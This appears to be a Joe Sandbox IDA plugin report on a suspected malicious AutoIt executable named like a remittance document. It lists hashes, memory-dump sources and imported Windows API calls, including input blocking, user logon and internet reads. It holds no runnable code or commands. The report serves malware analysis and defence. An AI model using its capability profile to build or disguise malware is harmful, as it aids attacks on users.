                                                                      • API String ID: 3541575487-0
                                                                      • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                      • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                      • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                      • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                      APIs
                                                                      • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                      • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                      • String ID:
                                                                      • API String ID: 48322524-0
                                                                      • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                      • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                      • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                      • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                      APIs
                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                      • String ID:
                                                                      • API String ID: 901099227-0
                                                                      • Opcode ID: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                                      • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                      • Opcode Fuzzy Hash: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
                                                                      • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                      APIs
                                                                      • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Proc
                                                                      • String ID:
                                                                      • API String ID: 2346855178-0
                                                                      • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                      • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                      • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                      • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                      APIs
                                                                      • BlockInput.USER32(00000001), ref: 0045A38B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: BlockInput
                                                                      • String ID:
                                                                      • API String ID: 3456056419-0
                                                                      • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                      • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                      • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                      • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                      APIs
                                                                      • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: LogonUser
                                                                      • String ID:
                                                                      • API String ID: 1244722697-0
                                                                      • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                      • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                      • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                      • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                      APIs
                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: NameUser
                                                                      • String ID:
                                                                      • API String ID: 2645101109-0
                                                                      • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                      • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                      • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                      • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                      • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                      • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                      • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: N@
                                                                      • API String ID: 0-1509896676
                                                                      • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                      • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                      • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                      • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                      • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                      • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                      • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                      • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                      • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                      • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                      • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                      • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                      • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                      • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                      • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                      • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                      • Instruction ID: f457ed30843a2a735df89a2f0b4e983c2ed54773d1622d6d4779f40ee0fd6586
                                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                      • Instruction Fuzzy Hash: 2C41A271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                      • Instruction ID: 45c27313cb465f1373b186660bb31a434a1c385367659cbb1da72ec043b0d8f8
                                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                      • Instruction Fuzzy Hash: 32019678A11209EFCB44DF99C6909ADF7B5FB49310F6086D9D819A7341D730AE52DB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                      • Instruction ID: 2718836cbd698e58549c494c9b0ee54eeb9c11a1842615f6d0ce607240cd7139
                                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                      • Instruction Fuzzy Hash: 1D019279A10249EFCB44DF99C6909AEF7B5FB49310F6086D9D819A7341E730AE42DB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                      APIs
                                                                      • DeleteObject.GDI32(?), ref: 0045953B
                                                                      • DeleteObject.GDI32(?), ref: 00459551
                                                                      • DestroyWindow.USER32(?), ref: 00459563
                                                                      • GetDesktopWindow.USER32 ref: 00459581
                                                                      • GetWindowRect.USER32(00000000), ref: 00459588
                                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                      • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                      • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                      • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                      • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                      • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                      • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                      • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                      • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                      • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                      • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                      • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                      • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                      • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                      • _wcslen.LIBCMT ref: 00459916
                                                                      • _wcscpy.LIBCMT ref: 0045993A
                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                      • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                      • GetDC.USER32(00000000), ref: 004599FC
                                                                      • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                      • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                      • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
